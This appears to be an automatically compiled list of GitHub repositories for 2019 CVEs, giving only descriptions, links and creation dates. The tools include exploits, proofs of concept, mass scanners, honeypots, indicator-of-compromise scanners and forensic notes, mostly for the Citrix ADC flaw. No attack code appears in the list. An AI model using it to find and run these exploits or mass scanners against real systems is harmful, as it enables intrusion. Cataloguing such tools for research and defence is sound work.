**Exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510)** : [projectzeroindia/CVE-2019-11510](https://api.github.com/repos/projectzeroindia/CVE-2019-11510) create time: 2019-08-21T08:40:26Z

**Citrix ADC Remote Code Execution** : [jas502n/CVE-2019-19781](https://api.github.com/repos/jas502n/CVE-2019-19781) create time: 2020-01-11T03:10:12Z

**Took at stab at an NSE discovery script for CVE-2019-19781.** : [becrevex/Citrix_CVE-2019-19781](https://api.github.com/repos/becrevex/Citrix_CVE-2019-19781) create time: 2020-01-11T18:04:17Z

**All Working Exploits** : [unknowndevice64/Exploits_CVE-2019-19781](https://api.github.com/repos/unknowndevice64/Exploits_CVE-2019-19781) create time: 2020-01-11T20:43:09Z

**A login bypass(CVE-2019-18371) and a command injection vulnerability(CVE-2019-18370) in Xiaomi Router R3G up to version 2.28.23.** : [UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC](https://api.github.com/repos/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC) create time: 2019-08-30T16:32:13Z

**Citrix Netscaler RCE** : [hollerith/CVE-2019-19781](https://api.github.com/repos/hollerith/CVE-2019-19781) create time: 2020-01-13T02:14:59Z

** McAfee Advanced Threat Defense ATD 4.6.x and earlier - Hardcoded root password** : [funoverip/mcafee_atd_CVE-2019-3663](https://api.github.com/repos/funoverip/mcafee_atd_CVE-2019-3663) create time: 2020-01-13T08:42:13Z

**None** : [Lanph3re/cve-2019-1108](https://api.github.com/repos/Lanph3re/cve-2019-1108) create time: 2020-01-14T04:31:17Z

**Automated script for Citrix ADC scanner (CVE-2019-19781) using hosts retrieved from Shodan API. You must have a Shodan account to use this script.** : [aqhmal/CVE-2019-19781](https://api.github.com/repos/aqhmal/CVE-2019-19781) create time: 2020-01-13T07:42:27Z

**CVE-2019-7238 Nexus RCE漏洞图形化一键检测工具。CVE-2019-7238 Nexus RCE Vul POC Tool.** : [magicming200/CVE-2019-7238_Nexus_RCE_Tool](https://api.github.com/repos/magicming200/CVE-2019-7238_Nexus_RCE_Tool) create time: 2020-01-10T09:19:10Z

**Check your website for CVE-2019-19781 Vulnerable** : [zgelici/CVE-2019-19781-Checker](https://api.github.com/repos/zgelici/CVE-2019-19781-Checker) create time: 2020-01-15T10:15:11Z

**Detect and log CVE-2019-19781 scan and exploitation attempts.** : [MalwareTech/CitrixHoneypot](https://api.github.com/repos/MalwareTech/CitrixHoneypot) create time: 2020-01-13T10:09:31Z

**Exploit for Pulse Connect Secure SSL VPN arbitrary file read vulnerability (CVE-2019-11510)** : [BishopFox/pwn-pulse](https://api.github.com/repos/BishopFox/pwn-pulse) create time: 2019-09-09T15:58:39Z

**IOCs for CVE-2019-19781** : [digitalshadows/CVE-2019-19781_IOCs](https://api.github.com/repos/digitalshadows/CVE-2019-19781_IOCs) create time: 2020-01-15T19:32:14Z

**None** : [Castaldio86/Detect-CVE-2019-19781](https://api.github.com/repos/Castaldio86/Detect-CVE-2019-19781) create time: 2020-01-16T10:09:05Z

**PhantomJS uses internal module: webpage, to open, close, render, and perform multiple actions on webpages, which suffers from an arbitrary file read vulnerability. The vulnerability exists in the page.open() function of the webpage module, which loads the specified URL and calls a given callback. When opening a HTML file, an attacker can supply specially crafted file content, which allows reading arbitrary files on the filesystem. The vulnerability is demonstrated by using page.render() as the function callback, resulting in the generation of a PDF or an image of the targeted file.** : [h4ckologic/CVE-2019-17221](https://api.github.com/repos/h4ckologic/CVE-2019-17221) create time: 2020-01-16T18:07:07Z

**citrix adc rce** : [5l1v3r1/Citrix_CVE-2019-19781](https://api.github.com/repos/5l1v3r1/Citrix_CVE-2019-19781) create time: 2020-05-08T12:32:05Z

**批量概念驗證用** : [b510/CVE-2019-19781](https://api.github.com/repos/b510/CVE-2019-19781) create time: 2020-01-17T06:09:18Z

**PoC Exploiting SQL Injection in Android's Download Provider in Sort Parameter (CVE-2019-2196)** : [IOActive/AOSP-DownloadProviderDbDumperSQLiLimit](https://api.github.com/repos/IOActive/AOSP-DownloadProviderDbDumperSQLiLimit) create time: 2020-01-14T12:21:16Z

**PoC Exploiting SQL Injection in Android's Download Provider in Selection Parameter (CVE-2019-2198)** : [IOActive/AOSP-DownloadProviderDbDumperSQLiWhere](https://api.github.com/repos/IOActive/AOSP-DownloadProviderDbDumperSQLiWhere) create time: 2020-01-14T12:20:18Z

**CVE-2019-19781 Attack Triage Script** : [redscan/CVE-2019-19781](https://api.github.com/repos/redscan/CVE-2019-19781) create time: 2020-01-17T16:14:30Z

**A fast multi threaded scanner for Citrix ADC (NetScaler) CVE-2019-19781 - Citrixmash / Shitrix** : [x1sec/citrixmash_scanner](https://api.github.com/repos/x1sec/citrixmash_scanner) create time: 2020-01-12T15:16:54Z

**Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway [ CVE-2019-19781 ]** : [projectzeroindia/CVE-2019-19781](https://api.github.com/repos/projectzeroindia/CVE-2019-19781) create time: 2020-01-10T22:56:35Z

**The exploitation module for the CVE-2019-19781 #Shitrix (Vulnerability in Citrix Application Delivery Controller and Citrix Gateway).** : [mekhalleh/citrix_dir_traversal_rce](https://api.github.com/repos/mekhalleh/citrix_dir_traversal_rce) create time: 2020-01-13T14:07:15Z

**None** : [DIVD-NL/Citrix-CVE-2019-19781](https://api.github.com/repos/DIVD-NL/Citrix-CVE-2019-19781) create time: 2020-01-20T06:18:39Z

**CVE-2019-19781 bash exploit ** : [ynsmroztas/citrix.sh](https://api.github.com/repos/ynsmroztas/citrix.sh) create time: 2020-01-20T15:30:30Z

**CVE-2019-0708-EXP-Windows版单文件exe版,运行后直接在当前控制台反弹System权限Shell** : [cbwang505/CVE-2019-0708-EXP-Windows](https://api.github.com/repos/cbwang505/CVE-2019-0708-EXP-Windows) create time: 2020-01-21T02:22:29Z

**Código desenvolvido para a verificação em massa da vulnerabilidade CVE-2019-19781 de hosts descobertos pelo Shodan. Pull requests são bem vindas. ** : [digitalgangst/massCitrix](https://api.github.com/repos/digitalgangst/massCitrix) create time: 2020-01-21T15:18:08Z

**Exploit for PyInstaller CVE-2019-16784** : [AlterSolutions/PyInstallerPrivEsc](https://api.github.com/repos/AlterSolutions/PyInstallerPrivEsc) create time: 2020-01-22T13:23:45Z

**This is a tool published for the Citrix ADC (NetScaler) vulnerability. We are only disclosing this due to others publishing the exploit code first.** : [trustedsec/cve-2019-19781](https://api.github.com/repos/trustedsec/cve-2019-19781) create time: 2020-01-11T00:08:27Z

**Citrix ADC (NetScaler) Honeypot. Supports detection for CVE-2019-19781 and login attempts** : [x1sec/citrix-honeypot](https://api.github.com/repos/x1sec/citrix-honeypot) create time: 2020-01-22T13:00:18Z

**This is a filter bypass exploit that results in arbitrary file upload and remote code execution in class.upload.php <= 2.0.3** : [jra89/CVE-2019-19576](https://api.github.com/repos/jra89/CVE-2019-19576) create time: 2019-12-04T15:01:00Z

**Audit Guide for the Citrix ADC Vulnerability CVE-2019-19871. Collected from multiple sources and threat assessments. Will be updated as new methods come up.** : [VDISEC/CVE-2019-19871-AuditGuide](https://api.github.com/repos/VDISEC/CVE-2019-19871-AuditGuide) create time: 2020-01-20T18:34:51Z

**My Citrix ADC NetScaler CVE-2019-19781 Vulnerability DFIR notes. ** : [Azeemering/CVE-2019-19781-DFIR-Notes](https://api.github.com/repos/Azeemering/CVE-2019-19781-DFIR-Notes) create time: 2020-01-23T08:41:51Z

**Heap buffer overflow in GNOME gThumb and Linux Mint Pix** : [Fysac/CVE-2019-20326](https://api.github.com/repos/Fysac/CVE-2019-20326) create time: 2020-01-03T01:39:03Z

**This repository contains the sources and documentation for the SWAPGS attack PoC (CVE-2019-1125)** : [bitdefender/swapgs-attack-poc](https://api.github.com/repos/bitdefender/swapgs-attack-poc) create time: 2020-01-27T12:27:53Z

**Python CVE-2019-19781 exploit** : [RaulCalvoLaorden/CVE-2019-19781](https://api.github.com/repos/RaulCalvoLaorden/CVE-2019-19781) create time: 2020-01-28T12:09:51Z

**None** : [zenturacp/cve-2019-19781-web](https://api.github.com/repos/zenturacp/cve-2019-19781-web) create time: 2020-01-14T21:54:08Z

**a script to look for CVE-2019-19781 Vulnerability within a domain and it's subdomains** : [0xams/citrixvulncheck](https://api.github.com/repos/0xams/citrixvulncheck) create time: 2020-01-23T15:13:04Z

**CVE-2019-14314 - NextGEN Gallery 3.2.10 Authenticated SQL Injection** : [imthoe/CVE-2019-14314](https://api.github.com/repos/imthoe/CVE-2019-14314) create time: 2020-01-31T09:54:06Z

**Check ADC for CVE-2019-19781** : [j81blog/ADC-19781](https://api.github.com/repos/j81blog/ADC-19781) create time: 2020-01-16T12:33:00Z

**CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4** : [mufeedvh/CVE-2019-8449](https://api.github.com/repos/mufeedvh/CVE-2019-8449) create time: 2020-02-02T16:42:32Z

**An XML External Entity Injection (XXE) vulnerability in the Management System (console) of BlackBerry AtHoc versions earlier than 7.6 HF-567 could allow an attacker to potentially read arbitrary local files from the application server or make requests on the network by entering maliciously crafted XML in an existing field.** : [nxkennedy/CVE-2019-8997](https://api.github.com/repos/nxkennedy/CVE-2019-8997) create time: 2019-04-18T01:09:02Z

**DFIR notes for Citrix ADC (NetScaler) appliances vulnerable to CVE-2019-19781** : [x1sec/CVE-2019-19781](https://api.github.com/repos/x1sec/CVE-2019-19781) create time: 2020-01-12T23:13:56Z

**Remote code execution in Microvirt MEmu** : [seqred-s-a/cve-2019-14514](https://api.github.com/repos/seqred-s-a/cve-2019-14514) create time: 2020-02-06T08:54:45Z

**tfp0 based on CVE-2019-8591/CVE-2019-8605** : [jsherman212/used_sock](https://api.github.com/repos/jsherman212/used_sock) create time: 2020-01-20T00:33:37Z

**None** : [underprotection/CVE-2019-19550](https://api.github.com/repos/underprotection/CVE-2019-19550) create time: 2020-01-30T00:11:20Z

**Advisory & PoC** : [0x-nope/CVE-2019-12180](https://api.github.com/repos/0x-nope/CVE-2019-12180) create time: 2020-01-20T17:33:23Z

**Yetishare SQL Injection in sSortDir_0 parameter - v3.5.2 - v4.5.4. Apart from an admin being able to exploit this, it could also be used in a CSRF attack to trick an admin user into running malicious queries.** : [jra89/CVE-2019-20059](https://api.github.com/repos/jra89/CVE-2019-20059) create time: 2020-02-07T17:47:03Z

**Containerized and deployable use of the CVE-2019-14287 vuln. View README.md for more.** : [CMNatic/Dockerized-CVE-2019-14287](https://api.github.com/repos/CMNatic/Dockerized-CVE-2019-14287) create time: 2020-02-09T21:05:20Z

**Netis router RCE exploit ( CVE-2019-19356)** : [shadowgatt/CVE-2019-19356](https://api.github.com/repos/shadowgatt/CVE-2019-19356) create time: 2019-12-12T11:01:23Z

**https://github.com/awakened1712/CVE-2019-11932** : [dashtic172/https-github.com-awakened171](https://api.github.com/repos/dashtic172/https-github.com-awakened171) create time: 2020-02-11T02:00:14Z

**CVE-2019-0859 1day Exploit** : [Sheisback/CVE-2019-0859-1day-Exploit](https://api.github.com/repos/Sheisback/CVE-2019-0859-1day-Exploit) create time: 2019-06-07T04:37:34Z

**CVE-2019-19844 Docker Edition** : [0xsha/CVE_2019_19844](https://api.github.com/repos/0xsha/CVE_2019_19844) create time: 2020-01-18T13:32:21Z

**None** : [r00t4dm/CVE-2019-17564](https://api.github.com/repos/r00t4dm/CVE-2019-17564) create time: 2020-02-12T04:55:51Z

**CVE-2019-17564 Apache Dubbo deserialization RCE** : [Jaky5155/CVE-2019-17564](https://api.github.com/repos/Jaky5155/CVE-2019-17564) create time: 2020-02-13T01:40:50Z

**Exploit for CVE-2019-18634** : [N1et/CVE-2019-18634](https://api.github.com/repos/N1et/CVE-2019-18634) create time: 2020-02-13T11:57:38Z

**CVE-2019-17564 : Apache Dubbo Deserialization Remote Code Execution** : [Hu3sky/CVE-2019-17564](https://api.github.com/repos/Hu3sky/CVE-2019-17564) create time: 2020-02-14T02:41:31Z

**Simple POC for CVE-2019-16394** : [SilentVoid13/Silent_CVE_2019_16394](https://api.github.com/repos/SilentVoid13/Silent_CVE_2019_16394) create time: 2020-02-14T17:41:00Z

**None** : [Exploit-3389/CVE-2019-17564](https://api.github.com/repos/Exploit-3389/CVE-2019-17564) create time: 2020-02-17T09:52:47Z

**CVE-2019-5096(UAF in upload handler) exploit cause Denial of Service** : [papinnon/CVE-2019-5096-GoAhead-Web-Server-Dos-Exploit](https://api.github.com/repos/papinnon/CVE-2019-5096-GoAhead-Web-Server-Dos-Exploit) create time: 2020-02-17T13:44:36Z

**Automated forensic script hunting for cve-2019-19781** : [onSec-fr/CVE-2019-19781-Forensic](https://api.github.com/repos/onSec-fr/CVE-2019-19781-Forensic) create time: 2020-01-15T20:43:37Z

**SonicWall CVE-2019-7482** : [singletrackseeker/CVE-2019-7482](https://api.github.com/repos/singletrackseeker/CVE-2019-7482) create time: 2020-02-18T19:17:55Z

**A functional exploit for CVE-2019-18634, a BSS overflow in sudo's pwfeedback feature that allows for for privesc** : [Plazmaz/CVE-2019-18634](https://api.github.com/repos/Plazmaz/CVE-2019-18634) create time: 2020-02-07T02:41:44Z

**CVE-2019-2729 Exploit Script** : [ruthlezs/CVE-2019-2729-Exploit](https://api.github.com/repos/ruthlezs/CVE-2019-2729-Exploit) create time: 2020-02-19T03:49:51Z

**Demo Android application for CVE-2019-9465** : [alexbakker/CVE-2019-9465](https://api.github.com/repos/alexbakker/CVE-2019-9465) create time: 2020-02-19T13:57:11Z

**Temproot for Bravia TV via CVE-2019-2215.** : [LIznzn/CVE-2019-2215](https://api.github.com/repos/LIznzn/CVE-2019-2215) create time: 2020-01-30T06:06:32Z

**Basic code for creating the Alibaba FastJson + Spring gadget chain, as used to exploit Apache Dubbo in CVE-2019-17564 - more information available at https://www.checkmarx.com/blog/apache-dubbo-unauthenticated-remote-code-execution-vulnerability** : [Dor-Tumarkin/CVE-2019-17564-FastJson-Gadget](https://api.github.com/repos/Dor-Tumarkin/CVE-2019-17564-FastJson-Gadget) create time: 2020-02-20T08:28:55Z

**CVE-2019-5736 implemented in a self-written container runtime to understand the exploit.** : [GiverOfGifts/CVE-2019-5736-Custom-Runtime](https://api.github.com/repos/GiverOfGifts/CVE-2019-5736-Custom-Runtime) create time: 2020-02-04T22:38:14Z

**:microscope: Jupyter notebook to help automate some of the forensic analysis related to Citrix Netscalers compromised via CVE-2019-19781** : [L4r1k/CitrixNetscalerAnalysis](https://api.github.com/repos/L4r1k/CitrixNetscalerAnalysis) create time: 2020-01-23T04:59:51Z

**TEST** : [JonathanZhou348/CVE-2019-3396TEST](https://api.github.com/repos/JonathanZhou348/CVE-2019-3396TEST) create time: 2019-10-28T08:43:40Z

**CVE-2019-17564:Apache Dubbo反序列化漏洞** : [fairyming/CVE-2019-17564](https://api.github.com/repos/fairyming/CVE-2019-17564) create time: 2020-02-24T07:46:36Z

**User Enumeration Proof Of Concept Exploit for CVE-2019-8449** : [r0lh/CVE-2019-8449](https://api.github.com/repos/r0lh/CVE-2019-8449) create time: 2020-02-14T10:33:00Z

**A patched Arch Linux PKGBUILD to address CVE-2019-0053 (buffer overflow). Downloads and applies a (currently) unreleased patch from upstream.** : [dreamsmasher/inetutils-CVE-2019-0053-Patched-PKGBUILD](https://api.github.com/repos/dreamsmasher/inetutils-CVE-2019-0053-Patched-PKGBUILD) create time: 2020-02-28T21:12:43Z

**Nostromo 1.9.6 - Remote Code Exectuion - CVE-2019-16278** : [Unam3dd/nostromo_1_9_6_rce](https://api.github.com/repos/Unam3dd/nostromo_1_9_6_rce) create time: 2020-02-29T09:42:59Z

**A small python script that checks for CVE-2019-8446** : [CyberTrashPanda/CVE-2019-8446](https://api.github.com/repos/CyberTrashPanda/CVE-2019-8446) create time: 2020-02-29T04:29:02Z

**Mass Exploit CVE-2019-16759** : [psychoxploit/vbull](https://api.github.com/repos/psychoxploit/vbull) create time: 2020-02-20T23:14:52Z

**CVE-2020-8012, CVE-2016-10709, CVE-2017-17099, CVE-2017-18047, CVE-2019-1003000, CVE-2018-1999002** : [wetw0rk/Exploit-Development](https://api.github.com/repos/wetw0rk/Exploit-Development) create time: 2017-04-26T02:03:43Z

**CVE-2019-7482 tracking** : [b4bay/CVE-2019-7482](https://api.github.com/repos/b4bay/CVE-2019-7482) create time: 2020-02-26T10:06:22Z

**POC for cve-2019-1458** : [piotrflorczyk/cve-2019-1458_POC](https://api.github.com/repos/piotrflorczyk/cve-2019-1458_POC) create time: 2020-03-03T17:55:07Z

**CVE-2019-13272** : [polosec/CVE-2019-13272](https://api.github.com/repos/polosec/CVE-2019-13272) create time: 2020-03-05T10:10:19Z

**None** : [PerimeterX/CVE-2019-18426](https://api.github.com/repos/PerimeterX/CVE-2019-18426) create time: 2020-02-29T21:36:46Z

**CVE-2019-9766 React** : [moonheadobj/CVE-2019-9766](https://api.github.com/repos/moonheadobj/CVE-2019-9766) create time: 2019-07-14T05:18:02Z

**The data set was provided by https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-2019.json.zip. The dataset was in json format i had to flatten it first.There were inner records again.I have flattened the file based on the sample given in the mail. Data set was about cyber security vulnarabilities.National vulnarabilities database is the product of the US NIST.NVD provides all the information regarding vulnarabilities.The main features i researched were about CWE codes,CVSS base score. cwe codes refers to The Common Weakness Enumeration Specification (CWE) provides a common language of discourse for discussing, finding and dealing with the causes of software security vulnerabilities as they are found in code, design, or system architecture. Each individual CWE represents a single vulnerability type. CWE is currently maintained by the MITRE Corporation with support from the National Cyber Security Division (DHS). A detailed CWE list is currently available at the MITRE website; this list provides a detailed definition for each individual CWE.[used from NVD website] Later, NIST provides common measure to analyse the effect of vulnarability called CVSS base score.I have taken this feature to measure the severity of the vulnarability with respect to cwe codes The data preparation and EDA is pretty straight forward.This problem looks like unsupervised learning because there were no class lables i thought to just cluster the cwe codes based on severity i.e base score,hence i used k means clustering.The k means clustering can be prone to outliers but the feature base score was from 1-10 which means it is scaled up already.Hence i decided to go with k means.** : [manish1772/Machine-learning-in-Cyber-security](https://api.github.com/repos/manish1772/Machine-learning-in-Cyber-security) create time: 2020-03-07T10:26:01Z

**None** : [dpmdpm2/CVE-2019-19905](https://api.github.com/repos/dpmdpm2/CVE-2019-19905) create time: 2020-03-07T20:23:04Z

**Gather a list of Citrix appliances in a country / state pair, and check if they're vulnerable to CVE-2019-19781** : [nmanzi/webcvescanner](https://api.github.com/repos/nmanzi/webcvescanner) create time: 2020-03-08T10:42:20Z

**Analysing https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-2019.json.zip** : [manankalra/NVD](https://api.github.com/repos/manankalra/NVD) create time: 2020-03-08T14:33:55Z

**CVE-2019-1458 Windows LPE Exploit** : [unamer/CVE-2019-1458](https://api.github.com/repos/unamer/CVE-2019-1458) create time: 2020-03-11T08:30:14Z

**Working exploit code for CVE-2019-17625** : [Ekultek/CVE-2019-17625](https://api.github.com/repos/Ekultek/CVE-2019-17625) create time: 2019-10-31T03:40:07Z

**None** : [qq1515406085/CVE-2019-19356](https://api.github.com/repos/qq1515406085/CVE-2019-19356) create time: 2020-03-13T08:22:36Z

**这篇文章将分享Windows远程桌面服务漏洞(CVE-2019-0708),并详细讲解该漏洞及防御措施。作者作为网络安全的小白,分享一些自学基础教程给大家,主要是关于安全工具和实践操作的在线笔记,希望您们喜欢。同时,更希望您能与我一起操作和进步,后续将深入学习网络安全和系统安全知识并分享相关实验。总之,希望该系列文章对博友有所帮助,写文不易,大神们不喜勿喷,谢谢!** : [eastmountyxz/CVE-2019-0708-Windows](https://api.github.com/repos/eastmountyxz/CVE-2019-0708-Windows) create time: 2020-02-19T05:40:22Z

**Outlook iOS Spoofing Vulnerability** : [d0gukank/CVE-2019-1218](https://api.github.com/repos/d0gukank/CVE-2019-1218) create time: 2019-10-09T16:12:09Z

**None** : [rhbb/CVE-2019-13956](https://api.github.com/repos/rhbb/CVE-2019-13956) create time: 2020-03-16T01:43:04Z

**CVE-2019-13086漏洞的复现以及poc实验代码** : [lingchuL/CVE_POC_test](https://api.github.com/repos/lingchuL/CVE_POC_test) create time: 2020-03-16T06:34:40Z

**CVE 2019-2215 Android Binder Use After Free** : [marcinguy/CVE-2019-2215](https://api.github.com/repos/marcinguy/CVE-2019-2215) create time: 2019-10-16T11:27:44Z

**Scanner CVE-2019-0708** : [JSec1337/Scanner-CVE-2019-0708](https://api.github.com/repos/JSec1337/Scanner-CVE-2019-0708) create time: 2020-03-17T05:05:14Z

**guest→system(UAC手动提权)** : [sv3nbeast/CVE-2019-1388](https://api.github.com/repos/sv3nbeast/CVE-2019-1388) create time: 2019-11-27T02:47:37Z

**PoC of CVE-2019-15126 kr00k vulnerability** : [0x13enny/kr00k](https://api.github.com/repos/0x13enny/kr00k) create time: 2020-03-09T11:15:08Z

**CVE-2019-1040 with Kerberos delegation** : [Ridter/CVE-2019-1040-dcpwn](https://api.github.com/repos/Ridter/CVE-2019-1040-dcpwn) create time: 2019-06-18T12:10:26Z

**PoC of CVE** : [ChoKyuWon/CVE-2019-13720](https://api.github.com/repos/ChoKyuWon/CVE-2019-13720) create time: 2020-03-21T16:21:16Z

**PoC exploit for the CVE-2019-15126 kr00k vulnerability** : [hexway/r00kie-kr00kie](https://api.github.com/repos/hexway/r00kie-kr00kie) create time: 2020-03-13T14:53:54Z

**D-Link DIR-859 - RCE UnAutenticated (CVE-2019–17621)** : [s1kr10s/D-Link-DIR-859-RCE](https://api.github.com/repos/s1kr10s/D-Link-DIR-859-RCE) create time: 2019-10-16T15:32:45Z

**Indicator of Compromise Scanner for CVE-2019-19781** : [fireeye/ioc-scanner-CVE-2019-19781](https://api.github.com/repos/fireeye/ioc-scanner-CVE-2019-19781) create time: 2020-01-21T15:20:25Z

**Indicator of Compromise Scanner for CVE-2019-19781** : [citrix/ioc-scanner-CVE-2019-19781](https://api.github.com/repos/citrix/ioc-scanner-CVE-2019-19781) create time: 2020-01-21T23:13:00Z

**Exploit for the CVE-2019-16278 vulnerability** : [keshiba/cve-2019-16278](https://api.github.com/repos/keshiba/cve-2019-16278) create time: 2020-03-30T08:54:06Z

**None** : [rhbb/CVE-2019-7609](https://api.github.com/repos/rhbb/CVE-2019-7609) create time: 2020-04-03T10:23:03Z

**None** : [rhbb/CVE-2019-17671](https://api.github.com/repos/rhbb/CVE-2019-17671) create time: 2020-04-03T08:29:07Z

**Centreon =<19.10 Authenticated RCE** : [SpengeSec/CVE-2019-19699](https://api.github.com/repos/SpengeSec/CVE-2019-19699) create time: 2020-01-17T17:07:45Z

**[CVE-2019-14615] iGPU Leak: An Information Leakage Vulnerability on Intel Integrated GPU** : [HE-Wenjian/iGPU-Leak](https://api.github.com/repos/HE-Wenjian/iGPU-Leak) create time: 2020-01-18T08:23:46Z

**KR00K - CVE-2019-15126** : [mustafasevim/kr00k-vulnerability](https://api.github.com/repos/mustafasevim/kr00k-vulnerability) create time: 2020-04-05T17:46:41Z

**A CVE-2019-11580 shell** : [shelld3v/CVE-2019-11580](https://api.github.com/repos/shelld3v/CVE-2019-11580) create time: 2020-03-06T17:09:26Z

**CVE-2019-5475-EXP 【Nexus Repository Manager 2.x远程命令执行漏洞】** : [rabbitmask/CVE-2019-5475-EXP](https://api.github.com/repos/rabbitmask/CVE-2019-5475-EXP) create time: 2020-04-12T15:49:36Z

**Reproduction of privilege escalation breach CVE-2019-3010** : [chaizeg/privilege-escalation-breach](https://api.github.com/repos/chaizeg/privilege-escalation-breach) create time: 2020-04-13T20:44:02Z

**Reproduction of CSRF breach CVE-2019-1010054** : [chaizeg/CSRF-breach](https://api.github.com/repos/chaizeg/CSRF-breach) create time: 2020-04-13T20:56:00Z

**https://bugs.chromium.org/p/project-zero/issues/detail?id=1820** : [tunnelshade/cve-2019-11707](https://api.github.com/repos/tunnelshade/cve-2019-11707) create time: 2020-04-13T15:11:46Z

**MacOS kernel memory leak (4 bytes)** : [DimitriFourny/cve-2019-6207](https://api.github.com/repos/DimitriFourny/cve-2019-6207) create time: 2020-04-10T14:30:16Z

**Android privilege escalation via an use-after-free in binder.c** : [DimitriFourny/cve-2019-2215](https://api.github.com/repos/DimitriFourny/cve-2019-2215) create time: 2020-02-17T11:53:54Z

**Privilege escalation in Andy emulator** : [seqred-s-a/cve-2019-14326](https://api.github.com/repos/seqred-s-a/cve-2019-14326) create time: 2020-03-24T10:31:23Z

**NVMS 1000 - Directory Traversal Attack Exploit for CVE-2019-20085** : [AleDiBen/NVMS1000-Exploit](https://api.github.com/repos/AleDiBen/NVMS1000-Exploit) create time: 2020-04-15T10:31:14Z

**PoC code for CVE-2019-14040** : [tamirzb/CVE-2019-14040](https://api.github.com/repos/tamirzb/CVE-2019-14040) create time: 2020-02-03T23:04:49Z

**PoC code for CVE-2019-14041** : [tamirzb/CVE-2019-14041](https://api.github.com/repos/tamirzb/CVE-2019-14041) create time: 2020-02-03T23:05:10Z

**漏洞环境复现** : [scxiaotan1/Docker](https://api.github.com/repos/scxiaotan1/Docker) create time: 2020-04-17T02:51:07Z

**D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1** : [huzaifahussain98/CVE-2019-17525](https://api.github.com/repos/huzaifahussain98/CVE-2019-17525) create time: 2020-04-18T06:06:44Z

**None** : [darren646/CVE-2019-19781POC](https://api.github.com/repos/darren646/CVE-2019-19781POC) create time: 2020-04-20T08:33:34Z

**None** : [0katz/CVE-2019-12476](https://api.github.com/repos/0katz/CVE-2019-12476) create time: 2019-06-10T18:14:34Z

**None** : [snappyJack/pdfresurrect_CVE-2019-14267](https://api.github.com/repos/snappyJack/pdfresurrect_CVE-2019-14267) create time: 2020-04-22T14:46:57Z

**Automated script for Pulse Secure SSL VPN exploit (CVE-2019-11510) using hosts retrieved from Shodan API. You must have a Shodan account to use this script.** : [aqhmal/pulsexploit](https://api.github.com/repos/aqhmal/pulsexploit) create time: 2019-12-07T17:09:24Z

**android-kernel-exploitation-ashfaq-CVE-2019-2215 docker setup for mac users ** : [qre0ct/android-kernel-exploitation-ashfaq-CVE-2019-2215](https://api.github.com/repos/qre0ct/android-kernel-exploitation-ashfaq-CVE-2019-2215) create time: 2020-04-25T07:31:35Z

**增强版WeblogicScan、检测结果更精确、插件化、添加CVE-2019-2618,CVE-2019-2729检测,Python3支持** : [dr0op/WeblogicScan](https://api.github.com/repos/dr0op/WeblogicScan) create time: 2019-06-21T09:22:43Z

**None** : [snappyJack/CVE-2019-8936](https://api.github.com/repos/snappyJack/CVE-2019-8936) create time: 2020-04-26T11:07:19Z

**Whatsapp Automatic Payload Generator [CVE-2019-11932]** : [Err0r-ICA/WhatsPayloadRCE](https://api.github.com/repos/Err0r-ICA/WhatsPayloadRCE) create time: 2020-04-22T21:11:27Z

**Centreon Monitoring Software Images that are vulnerable to CVE 2019-19699 and more.** : [SpengeSec/Centreon-Vulnerable-Images](https://api.github.com/repos/SpengeSec/Centreon-Vulnerable-Images) create time: 2020-04-28T09:46:57Z

**None** : [sumedhaDharmasena/-Kernel-ptrace-c-mishandles-vulnerability-CVE-2019-13272](https://api.github.com/repos/sumedhaDharmasena/-Kernel-ptrace-c-mishandles-vulnerability-CVE-2019-13272) create time: 2020-05-02T05:41:54Z

**None** : [Billith/CVE-2019-5736-PoC](https://api.github.com/repos/Billith/CVE-2019-5736-PoC) create time: 2020-05-01T21:07:42Z

**patches for SNYK-JS-JQUERY-174006, CVE-2019-11358, CVE-2019-5428** : [DanielRuf/snyk-js-jquery-174006](https://api.github.com/repos/DanielRuf/snyk-js-jquery-174006) create time: 2019-03-30T10:03:36Z

**patches for SNYK-JS-JQUERY-565129, SNYK-JS-JQUERY-567880, CVE-2020-1102, CVE-2020-11023, includes the patches for SNYK-JS-JQUERY-174006, CVE-2019-11358, CVE-2019-5428** : [DanielRuf/snyk-js-jquery-565129](https://api.github.com/repos/DanielRuf/snyk-js-jquery-565129) create time: 2020-04-14T19:12:01Z

**None** : [Silence-Rain/14-828_Exploitation_of_CVE-2019-5822](https://api.github.com/repos/Silence-Rain/14-828_Exploitation_of_CVE-2019-5822) create time: 2020-05-06T09:05:23Z

**Remote Unauthenticated Heap Memory Corruption in Quick N' Easy Web Server <= 3.3.8** : [cwinfosec/CVE-2019-19943](https://api.github.com/repos/cwinfosec/CVE-2019-19943) create time: 2020-02-23T01:53:00Z

**Local Root vulnerability- CVE-2019-13272 / Security Bypass Vulnerability – CVE-2019-14287** : [Tharana/Exploiting-a-Linux-kernel-vulnerability](https://api.github.com/repos/Tharana/Exploiting-a-Linux-kernel-vulnerability) create time: 2020-05-11T11:24:29Z

**judge vulnerability of the target** : [Jerry-Swift/CVE-2019-19781-scanner](https://api.github.com/repos/Jerry-Swift/CVE-2019-19781-scanner) create time: 2020-05-11T13:31:05Z

**Documentation for Sudo Security Bypass - CVE 2019-14287** : [SachinthaDeSilva-cmd/Exploit-CVE-2019-14287](https://api.github.com/repos/SachinthaDeSilva-cmd/Exploit-CVE-2019-14287) create time: 2020-05-11T16:40:12Z

**Unquoted Service Path exploit in FortiClient (CVE-2019-17658)** : [Ibonok/CVE-2019-17658](https://api.github.com/repos/Ibonok/CVE-2019-17658) create time: 2020-03-11T11:58:24Z

**None** : [ShianTrish/sudo-Security-Bypass-vulnerability-CVE-2019-14287](https://api.github.com/repos/ShianTrish/sudo-Security-Bypass-vulnerability-CVE-2019-14287) create time: 2020-05-12T10:16:49Z

**None** : [RashmikaEkanayake/Privilege-Escalation-CVE-2019-13272-](https://api.github.com/repos/RashmikaEkanayake/Privilege-Escalation-CVE-2019-13272-) create time: 2020-05-12T11:53:55Z

**CVE-2019-5736** : [shen54/IT19172088](https://api.github.com/repos/shen54/IT19172088) create time: 2020-05-12T14:47:27Z

